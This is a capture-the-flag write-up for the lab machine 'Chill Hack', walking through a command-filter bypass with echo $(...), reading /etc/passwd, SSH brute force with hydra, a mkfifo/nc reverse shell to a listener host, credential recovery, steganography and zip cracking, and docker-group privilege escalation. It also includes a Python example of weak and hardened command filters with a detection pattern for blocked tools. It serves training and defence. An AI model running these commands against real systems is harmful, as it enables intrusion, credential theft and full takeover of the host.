Last updated: 15 Apr 24 09:31:10 (UTC)

Write-Up Chill-Hack

Chill Hack

By Lawcky 01/01/2024

Introduction

Real Life machine vs CTF

Difficulty : Intermediate

Additional info:

Name: Chill Hack: 1
Release date: 9 Dec 2020
Author: Anurodh Acharya
Series: Chill Hack

|NOTE| we won't copy all the scans here as they would be far too voluminous; click here to see them


In this write-up

  • nmap
  • nikto
  • hydra
  • ffuf
  • mysql
  • hashcat
  • zip2john
  • pycrack (first time)
  • steghide (first time)
  • docker

Write-UP

On 192.168.1.94/secret/ it is possible to execute commands, but a filter blocks commands that could be harmful.

Using echo with command substitution we can get past the filter:

echo $(ls)
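To show why a denylist does not stop this, here is an added example (not code from the machine's /secret/ page; the list of blocked words, the first-word matching and the allowlist are assumptions): a weak filter that only checks the first word, a hardened allowlist filter that rejects shell metacharacters, and a log rule that flags substitution-wrapped blocked words.

```python
import re
import shlex

# Constructed denylist in the spirit of the filter on /secret/ (assumption:
# the page does not show the real list or how it is matched).
DENYLIST = {"nc", "bash", "sh", "python", "python3", "perl", "php", "rm", "cat", "ls"}

# Hardened variant: only these program names may run (assumption for the example).
ALLOWLIST = {"echo", "date", "whoami", "id", "uptime"}

# Anything that lets the shell chain, redirect or substitute commands.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n]")


def weak_filter(cmd: str) -> bool:
    """Denylist applied to the first word only: `echo $(ls)` gets past it."""
    first = cmd.strip().split(" ", 1)[0]
    return first not in DENYLIST


def hardened_filter(cmd: str) -> bool:
    """Reject shell metacharacters, then allowlist the program name.

    The caller must also execute the parsed argv with shell=False so that
    no shell ever re-parses the string.
    """
    if SHELL_META.search(cmd):
        return False
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWLIST


def looks_like_bypass(cmd: str) -> bool:
    """Detection rule for request logs: a denylisted word wrapped in $(...) or backticks."""
    pattern = r"(\$\(|`)\s*(" + "|".join(sorted(DENYLIST)) + r")\b"
    return bool(re.search(pattern, cmd))
```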

Then we list all the users with:

echo $(cat /etc/passwd)

echo $(ls /home)

hydra -L users -P /usr/share/SecLists/Passwords/common_corporate_passwords.lst ssh://192.168.1.94/

after many tries this reverse shell worked

echo $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.253 4242 >/tmp/f)

After upgrading to a full TTY we now have direct access to the server.

on apaar’s desktop

By running that script with sudo as apaar and entering /bin/sh at its prompt, we got apaar’s shell.

{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

First flag found.

Enumeration

We run linpeas.sh:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

chmod +x linpeas.sh && ./linpeas.sh


ssh version is vulnerable ==> git clone https://github.com/CptGibbon/CVE-2021-3156.git

It didn't work.


In /var/www/ we found some files that are not part of the original site; inside them we found credentials for a MySQL database:

root:!@m+her00+@db

We found hashes in the database, which give us these credentials:

aurick:masterpassword

apaar:dontaskdonttell

I now have these two passwords and need to find out what they are used for.

They do not belong to any of the Linux users.


Hidden Zip files

Many of the texts in the unused files in /var/www talk about ‘looking in the dark for answers’, so I thought the images might hide something. After starting a temporary Python HTTP server I transferred the files and inspected them with the strings command:

python -m http.server 8080

wget ...

strings hacker-with-laptop_23-2147985341.jpg

strings turned up nothing, but steghide with an empty passphrase extracted a zip file:

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

We then use pycrack to crack the password of the zip file:

python3 pycrack.py

We select the dictionary attack and the rockyou wordlist.

We get a PHP page containing a base64-encoded password and a mention of the user anurodh:

anurodh:!d0ntKn0wmYp@ssw0rd


Privilege Escalation

The anurodh user belongs to the docker group, so we can use that for our privesc:

docker run -v /etc/:/mnt -it alpine

This command starts an alpine container as root and mounts the host's /etc/ onto /mnt inside it, giving us root-level access to the host's files.

{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}

Got the second flag.